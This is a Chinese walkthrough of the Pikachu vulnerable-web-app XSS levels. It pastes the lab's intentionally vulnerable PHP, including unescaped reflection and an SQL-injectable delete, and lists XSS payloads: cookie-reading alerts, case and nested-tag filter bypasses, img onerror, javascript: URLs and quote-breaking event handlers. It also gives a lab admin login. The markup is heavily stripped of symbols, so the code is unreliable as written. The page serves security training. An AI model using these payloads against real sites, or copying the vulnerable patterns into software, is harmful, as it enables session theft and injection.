pikachu-xss通关教程
反射型xss(get):?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_reflected_get.php){ $ACTIVE array(,,,,,,,active open,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ if($_GET[message]kobe){ $html.p classnotice愿你和{$_GET[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_GET[message]},i dont care!/p; } } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactive反射型xss(get)/li /ul!-- /.breadcrumb -- a href# stylefloat:right>反射型xss(post):scriptalert(document.cookie)/script存储型xss?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_stored.php){ $ACTIVE array(,,,,,,,active open,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; $linkconnect(); $html; if(array_key_exists(message,$_POST) $_POST[message]!null){ $messageescape($link, $_POST[message]); $queryinsert into message(content,time) values($message,now()); $resultexecute($link, $query); if(mysqli_affected_rows($link)!1){ $html.p数据库出现异常提交失败/p; } } if(array_key_exists(id, $_GET) is_numeric($_GET[id])){ //彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入 $querydelete from message where id{$_GET[id]}; $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ echo script typetext/javascriptdocument.location.hrefxss_stored.php/script; }else{ $html.p idop_notice删除失败,请重试并检查数据库是否还好!/p; } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactive存储型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right>DOM型xss?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_dom.php){ $ACTIVE array(,,,,,,,active open,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; if(isset($_GET[text])){ $haha 这里是后台的处理逻辑; } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactiveDOM型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right>javascript:alert(22); //里边用数字 javascript:alert(XSS); //不行 javascript:alert(XSS);方法二οnclickalert(1)onclickalert(333) onclickalert(333) # onclickalert(111)DOM-XSS-x:?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_dom.php){ $ACTIVE array(,,,,,,,active open,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; $html; if(isset($_GET[text])){ $html. a href# onclickdomxss()有些费尽心机想要忘记的事情,后来真的就忘掉了/a; } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactiveDOM型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right># onclickalert(111)XSS-盲打提交留言然后登录http://192.168.40.133:83/vul/xss/xssblind/admin_login.phpscriptalert(1)/script scriptalert(document.cookie)/script scriptalert(xss);/script scriptalert(xss)/script scriptalert(1)/script 大小写不需要 sCrIPtalert(XSS-Reflect01);/sCrIpT sCRiptalert(XSS-Reflect01);/sCRipt ScriPTalert(XSS-Reflect01);/sCrIpT scscriptriptalert(xss-reflect002);/script img src0 onerroralert(XSS-img)http://192.168.40.133:83/vul/xss/xssblind/admin_login.php ;admin/123456;xss之过滤:根据提示考虑绕过参考scriptalert(1)/script scriptalert(document.cookie)/script scriptalert(xss);/script scriptalert(xss)/script scriptalert(1)/script 大小写不需要 sCrIPtalert(XSS-Reflect01);/sCrIpT sCRiptalert(XSS-Reflect01);/sCRipt ScriPTalert(XSS-Reflect01);/sCrIpT scscriptriptalert(xss-reflect002);/script img src0 onerroralert(XSS-img)先测试一下payload:sCrIPtalert(122)/sCrIpT //大小写绕过 a herf# onclickalert(document.cookie) img src1 onerroralert(1)xss之htmlspecialchars先测试如下发现代码被原样输出htmlspecialchars()函数把预定义的字符转换为HTML实体。 预定义的字符是 • 和号 amp • 双引号 quot • 单引号 • 小于 lt • 大于 gt 我们也可以通过输入来排查什么字符被转义了 成为 amp 成为 quot 成为 #039 成为 lt 成为 gt 可用引号类型 ENT_COMPAT默认仅编码双引号 ENT_QUOTES编码双引号和单引号 ENT_NOQUOTES不编码任何引号我们可以发现和号、双引号和小于号、大于号被转义了而单引号可以正常使用οnclickalert(1)#οnmοuseοveralert(1)# οnclickalert(/xss/)avascript:alert(3333) // JavaScript伪协议 hack οnfοcusalert(5555) // 单引号闭合事件标签xss之href输出javascript:alert(111) // JavaScript伪协议?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_03.php){ $ACTIVE array(,,,,,,,active open,,,,,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice叫你输入个url,你咋不听?/p; } if($_GET[message] www.baidu.com){ $html.p classnotice我靠,我真想不到你是这样的一个人/p; }else { //输出在a标签的href属性里面,可以使用javascript协议来执行js //防御:只允许http,https,其次在进行htmlspecialchars处理 $messagehtmlspecialchars($_GET[message],ENT_QUOTES); $html.a href{$message} 阁下自己输入的url还请自己点一下吧/a; } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactivexss之href输出/li /ul!-- /.breadcrumb -- a href# stylefloat:right>?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_04.php){ $ACTIVE array(,,,,,,,active open,,,,,,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $jsvar; $html; //这里讲输入动态的生成到了js中,形成xss //javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义 //讲这个例子主要是为了让你明白,输出点在js中的xss问题,应该怎么修? //这里如果进行html的实体编码,虽然可以解决XSS的问题,但是实体编码后的内容,在JS里面不会进行翻译,这样会导致前端的功能无法使用。 //所以在JS的输出点应该使用\对特殊字符进行转义 if(isset($_GET[submit]) $_GET[message] !null){ $jsvar$_GET[message]; // $jsvarhtmlspecialchars($_GET[message],ENT_QUOTES); if($jsvar tmac){ $html.img src{$PIKA_ROOT_DIR}assets/images/nbaplayer/tmac.jpeg /; } } ? div classmain-content xmlnshttp://www.w3.org/1999/html div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactivexss之js输出/li /ul!-- /.breadcrumb -- a href# stylefloat:right>

相关新闻

手撸一个Vue(看不懂可以举报)

手撸一个Vue(看不懂可以举报)

手撸一个Vue(看不懂可以举报) 作为编程讲师,我深知很多同学对Vue的响应式原理充满好奇却又望而却步。今天,我们就从零开始,一步一步“手撸”一个简化版的Vue。如果你看完还看不懂,欢迎举报我!但请相信,跟着…

2026/7/31 6:38:21阅读更多 →
私域电商做了半年没起色?大概率是这三个环节出了问题

私域电商做了半年没起色?大概率是这三个环节出了问题

私域电商跑了半年还没起色,大概率不是方向错了,而是引流、留存、转化这三个环节里至少有一环在漏水。三环节串成一条漏斗:上游漏一点,到下游就放大成致命缺口。问题不出在执行勤奋度,出在诊断缺失——没人能说清到底哪…

2026/7/31 6:36:21阅读更多 →
MOS管损坏原因深度解析:从栅极驱动到热设计,全面规避硬件失效

MOS管损坏原因深度解析:从栅极驱动到热设计,全面规避硬件失效

1. 项目概述:从一次深夜维修说起 上周,我实验室里一台用了三年的可调直流电源突然罢工了,输出电压时有时无,还伴随着轻微的“嘶嘶”声。拆开一看,主功率变换部分的一颗TO-220封装的MOS管已经“壮烈牺牲”——外壳炸裂&…

2026/7/31 6:36:21阅读更多 →
C语言填空题精讲:40道题巩固专升本与期末考点

C语言填空题精讲:40道题巩固专升本与期末考点

1. 项目概述:为什么是“填空题”?如果你正在准备专升本考试,或者想系统性地巩固C语言基础,面对市面上浩如烟海的题库,是不是常常感到无从下手?选择题太依赖运气,编程大题又容易让人望而生畏&…

2026/7/31 7:56:49阅读更多 →
Python判空全解析:从if not x到is None的7种方法与实践

Python判空全解析:从if not x到is None的7种方法与实践

1. 项目概述:为什么“判空”是Python编程的基石在Python的世界里,处理一个变量是否为“空”是每天都要面对无数次的操作。无论是从数据库读取数据、解析API返回的JSON、处理用户输入,还是清理爬虫抓取的结果,你都得先问问自己&…

2026/7/31 7:56:49阅读更多 →
C++实现两数之和:从暴力破解到哈希优化

C++实现两数之和:从暴力破解到哈希优化

1. 两数之和:从暴力破解到哈希优化的C实现 两数之和(Two Sum)是力扣(LeetCode)题库中的第一道题目,也是算法入门必刷的经典问题。作为算法学习路上的"Hello World",它看似简单却蕴含着…

2026/7/31 7:56:49阅读更多 →
VDI格式文件是什么?如何用Win解压缩和VirtualBox打开vdi文件

VDI格式文件是什么?如何用Win解压缩和VirtualBox打开vdi文件

VDI 是 VirtualBox 虚拟机磁盘镜像文件,它保存的是虚拟硬盘的完整结构,和普通的压缩包完全是两回事。如果 VDI 外面还套了一层压缩包,可以用「软领Win解压缩」先把外层包提取出来;但真正的 VDI 本体需要通过 VirtualBox、只读挂载…

2026/7/31 7:56:49阅读更多 →
AI生成核销小程序,二维码怎么防重

AI生成核销小程序,二维码怎么防重

结论先放前面:AI可以很快搭出扫码核销页面,但“同一张票只能用一次”不能只靠按钮变灰。真正要验收的是状态更新、重复请求和弱网重试。我最近给一场200人工作坊做入场工具,页面半小时就能说明白,防重规则反而磨了两轮。检索关键词…

2026/7/31 7:56:49阅读更多 →
Cocos Creator帧动画组件开发:从原理到高性能实现

Cocos Creator帧动画组件开发:从原理到高性能实现

1. 项目概述:为什么我们需要一个自定义的帧动画播放组件? 在Cocos Creator项目中处理动画,尤其是序列帧动画,是每个开发者都会遇到的常规需求。引擎内置的 Sprite 组件配合 SpriteFrame 数组,或者使用 Animation …

2026/7/31 7:54:49阅读更多 →
覆盖国产 + 海外 + 开源模型,OpenClaw 2.7.9 Windows/Mac 双端部署详解

覆盖国产 + 海外 + 开源模型,OpenClaw 2.7.9 Windows/Mac 双端部署详解

🔹 工具基础介绍 OpenClaw 是开源生态中一款实用性较强的本地智能工具,凭借本地离线运行、可视化图形操作和任务自动化三大核心特性,赢得了众多用户的青睐。与普通在线对话AI工具不同,它属于能够直接操控本机软硬件的智能数字员工…

2026/7/30 15:03:16阅读更多 →
伺服阀焊完微漏毁整机?精密激光焊接三关锁住高压

伺服阀焊完微漏毁整机?精密激光焊接三关锁住高压

所谓液压伺服阀体的精密激光焊接,是用激光束对阀座壳体(通常为不锈钢或铝合金)进行密封焊接,使阀体在21-35MPa的高压液压油或压缩气体中长期运行而不发生介质泄漏。液压伺服阀是高端液压系统的"大脑"。从航空航天飞行控…

2026/7/30 12:22:27阅读更多 →
D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南

D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南

D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南 【免费下载链接】d2dx D2DX is a complete solution to make Diablo II run well on modern PCs, with high fps and better resolutions. 项目地址: https://gitcode.com/gh_mirrors/d2/d2dx 你是否还在…

2026/7/30 15:13:02阅读更多 →
物理复制比逻辑复制好在哪?数据库复制原理详解

物理复制比逻辑复制好在哪?数据库复制原理详解

数据库复制是把主库数据同步到备库的机制,分为逻辑复制和物理复制两种。逻辑复制传输的是 SQL 语句或行变更事件,物理复制传输的是存储引擎底层的物理日志。阿里云 PolarDB(云原生数据库)采用物理复制,在同步延迟、数据…

2026/7/31 0:00:40阅读更多 →
BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/gh_mirrors/bi/Bilib…

2026/7/31 0:00:41阅读更多 →
有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

当前,游戏行业的“DataAI融合”已从概念验证进入价值落地阶段。根据IDC 2025年数据,中国AI游戏云市场规模已达18.6亿元;同时,游戏研发环节AI渗透率高达86%,生成式AI内容普及率超过50%。面对庞大的市场,游戏…

2026/7/31 0:00:41阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/31 0:49:33阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/31 5:08:18阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/30 15:43:46阅读更多 →